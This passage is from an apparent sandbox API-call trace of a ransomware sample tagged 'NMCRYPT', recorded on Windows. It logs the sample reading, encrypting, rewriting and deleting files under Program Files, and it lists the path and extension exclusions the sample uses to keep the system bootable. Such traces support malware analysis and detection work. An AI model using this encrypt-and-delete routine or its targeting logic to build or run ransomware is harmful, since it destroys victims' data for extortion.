returned 1 [0155.509] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0xd7, lpOverlapped=0x0) returned 1 [0155.510] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xd7, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xe0) returned 1 [0155.510] GetLastError () returned 0x0 [0155.510] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0xe0, lpOverlapped=0x0) returned 1 [0155.589] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.589] WriteFile (in: hFile=0x588, lpBuffer=0x2901230*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml")) returned 0x20 [0155.589] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml", dwFileAttributes=0x20) returned 0 [0155.590] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml") returned 1 [0155.590] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml")) returned 0 [0155.590] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" [0155.590] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.590] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD2EA.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd2ea.tmp")) returned 0xd2ea [0155.591] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD2EA.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd2ea.tmp"), dwFlags=0x1) returned 0 [0155.591] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD2EA.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd2ea.tmp")) returned 1 [0155.591] CryptDestroyKey (hKey=0x9ad838) returned 1 [0155.591] wcslen (_String="OK") returned 0x2 [0155.591] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.591] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.592] CryptDestroyKey (hKey=0x9ad278) returned 1 [0155.592] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0155.592] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0155.592] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.592] wcscmp (_String1="symbols", _String2=".") returned 1 [0155.592] wcscmp (_String1="symbols", _String2="..") returned 1 [0155.592] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*NMCRYPT") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*Recovers your files.html") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*.exe") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*.dll") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*.lnk") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*.bat") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*.ini") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*.msi") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*.scf") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*pagefile.sys*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*AppData*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*\\winrar\\*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*\\java\\*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*\\windows\\*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*\\ESET\\*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*\\AVG\\*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*Atheros*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*Realtek*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*bootmgr*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*boot*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*boot*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*IO.SYS*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*ntldr*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*chrome*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*opera*") returned 0 [0155.592] PathMatchSpecW (pszFile="symbols.xml", pszSpec="*firefox*") returned 0 [0155.593] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml", pszSpec="*") returned 1 [0155.593] strlen (_Str="NMoreira") returned 0x8 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.593] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.594] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.595] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, 